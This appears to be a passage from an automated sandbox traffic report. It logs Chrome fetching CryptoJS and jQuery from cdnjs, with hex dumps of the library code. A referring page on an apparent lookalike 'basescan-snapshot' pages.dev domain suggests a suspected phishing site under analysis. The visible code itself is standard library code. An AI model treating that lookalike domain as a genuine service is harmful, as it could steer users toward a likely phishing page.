                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe298ac9a4276-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC445INData Raw: 31 35 39 36 0d 0a 2f 2a 0a 43 72 79 70 74 6f 4a 53 20 76 33 2e 31 2e 32 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 0a 28 63 29 20 32 30 30 39 2d 32 30 31 33 20 62 79 20 4a 65 66 66 20 4d 6f 74 74 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 2f 77 69 6b 69 2f 4c 69 63 65 6e 73 65 0a 2a 2f 0a 76 61 72 20 43 72 79 70 74 6f 4a 53 3d 43 72 79 70 74 6f 4a 53 7c 7c 66 75 6e 63 74 69 6f 6e 28 67 2c 6a 29 7b 76 61 72 20 65 3d 7b 7d 2c 64 3d 65 2e 6c 69 62 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6e 3d 64 2e 42 61 73 65 3d 7b 65 78 74 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6d 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                              Data Ascii: 1596/*CryptoJS v3.1.2code.google.com/p/crypto-js(c) 2009-2013 by Jeff Mott. All rights reserved.code.google.com/p/crypto-js/wiki/License*/var CryptoJS=CryptoJS||function(g,j){var e={},d=e.lib={},m=function(){},n=d.Base={extend:function(a){m.protot
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 65 78 74 65 6e 64 28 29 3b 61 2e 69 6e 69 74 2e 61 70 70 6c 79 28 61 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 61 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6d 69 78 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 28 74 68 69 73 5b 63 5d 3d 61 5b 63 5d 29 3b 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 74 68 69 73 2e 74 6f 53 74 72 69 6e 67 3d 61 2e 74 6f 53 74 72 69 6e 67 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 74 65 6e 64 28 74 68 69 73 29 7d 7d 2c 0a 71 3d 64 2e 57
                                                                                                                                                                                                                                              Data Ascii: extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},q=d.W
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 76 61 72 20 62 3d 5b 5d 2c 66 3d 30 3b 66 3c 61 3b 66 2b 2b 29 62 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 5b 66 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 38 2a 28 66 25 34 29 26 32 35 35 29 29 3b 72 65 74 75 72 6e 20 62 2e 6a 6f 69 6e 28 22 22 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 62 3d 5b 5d 2c 66 3d 30 3b 66 3c 63 3b 66 2b 2b 29 62 5b 66 3e 3e 3e 32 5d 7c 3d 28 61 2e 63 68 61 72 43 6f 64 65 41 74 28 66 29 26 32 35 35 29 3c 3c 32 34 2d 38 2a 28 66 25 34 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 71 2e 69 6e 69 74 28 62 2c 63 29 7d 7d 2c 68 3d 62 2e 55 74 66 38 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 72
                                                                                                                                                                                                                                              Data Ascii: var b=[],f=0;f<a;f++)b.push(String.fromCharCode(c[f>>>2]>>>24-8*(f%4)&255));return b.join("")},parse:function(a){for(var c=a.length,b=[],f=0;f<c;f++)b[f>>>2]|=(a.charCodeAt(f)&255)<<24-8*(f%4);return new q.init(b,c)}},h=b.Utf8={stringify:function(a){try{r
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 61 63 48 65 6c 70 65 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 64 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 77 2e 48 4d 41 43 2e 69 6e 69 74 28 61 2c 0a 64 29 29 2e 66 69 6e 61 6c 69 7a 65 28 62 29 7d 7d 7d 29 3b 76 61 72 20 77 3d 65 2e 61 6c 67 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 7d 28 4d 61 74 68 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 67 3d 43 72 79 70 74 6f 4a 53 2c 6a 3d 67 2e 6c 69 62 2c 65 3d 6a 2e 57 6f 72 64 41 72 72 61 79 2c 64 3d 6a 2e 48 61 73 68 65 72 2c 6d 3d 5b 5d 2c 6a 3d 67 2e 61 6c 67 6f 2e 53 48 41 31 3d 64 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 65 2e 69 6e 69 74 28 5b 31 37
                                                                                                                                                                                                                                              Data Ascii: acHelper:function(a){return function(b,d){return(new w.HMAC.init(a,d)).finalize(b)}}});var w=e.algo={};return e}(Math);(function(){var g=CryptoJS,j=g.lib,e=j.WordArray,d=j.Hasher,m=[],j=g.algo.SHA1=d.extend({_doReset:function(){this._hash=new e.init([17
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC982INData Raw: 69 73 2e 5f 69 4b 65 79 3d 64 2e 63 6c 6f 6e 65 28 29 2c 6c 3d 71 2e 77 6f 72 64 73 2c 6b 3d 62 2e 77 6f 72 64 73 2c 68 3d 30 3b 68 3c 67 3b 68 2b 2b 29 6c 5b 68 5d 5e 3d 31 35 34 39 35 35 36 38 32 38 2c 6b 5b 68 5d 5e 3d 39 30 39 35 32 32 34 38 36 3b 71 2e 73 69 67 42 79 74 65 73 3d 62 2e 73 69 67 42 79 74 65 73 3d 6e 3b 74 68 69 73 2e 72 65 73 65 74 28 29 7d 2c 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 68 61 73 68 65 72 3b 65 2e 72 65 73 65 74 28 29 3b 65 2e 75 70 64 61 74 65 28 74 68 69 73 2e 5f 69 4b 65 79 29 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 68 61 73 68 65 72 2e 75 70 64 61 74 65 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 66 69 6e 61 6c 69 7a 65 3a 66
                                                                                                                                                                                                                                              Data Ascii: is._iKey=d.clone(),l=q.words,k=b.words,h=0;h<g;h++)l[h]^=1549556828,k[h]^=909522486;q.sigBytes=b.sigBytes=n;this.reset()},reset:function(){var e=this._hasher;e.reset();e.update(this._iKey)},update:function(e){this._hasher.update(e);return this},finalize:f
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.549723104.17.25.144435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC607OUTGET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:56 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                              ETag: W/"63091225-797c"
                                                                                                                                                                                                                                              Last-Modified: Fri, 26 Aug 2022 18:34:13 GMT
                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90399
                                                                                                                                                                                                                                              Expires: Thu, 18 Sep 2025 01:15:56 GMT
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4%2FSwz8kyF0pdZ33w2jsjgTIvW0aHalPHbegK%2BJL9GygCVegpzUQfwEGS4BizeCGo1gryIfTMXk2ECdvSZOPg42lZuzBubEGTb9KdUbMf3bIOasbbUigMQZpCJ47nRMzBJ67jYcI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe29d5c1d0fa3-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC414INData Raw: 33 39 37 38 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                              Data Ascii: 3978/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 79 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 79 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 76 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e
                                                                                                                                                                                                                                              Data Ascii: peOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.n
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68
                                                                                                                                                                                                                                              Data Ascii: function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.push
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e
                                                                                                                                                                                                                                              Data Ascii: e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.len
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f
                                                                                                                                                                                                                                              Data Ascii: M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66
                                                                                                                                                                                                                                              Data Ascii: +" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?f
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28
                                                                                                                                                                                                                                              Data Ascii: ;return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e
                                                                                                                                                                                                                                              Data Ascii: =e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(fun
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d
                                                                                                                                                                                                                                              Data Ascii: r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[]
                                                                                                                                                                                                                                              2024-09-28 01:15:56 UTC1369INData Raw: 6e 74 28 22 69 6e 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64
                                                                                                                                                                                                                                              Data Ascii: nt("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),a.appendChild(e).disabled


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              8192.168.2.549725104.17.24.144435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC387OUTGET /ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                              ETag: W/"5eb03e2d-1596"
                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 2
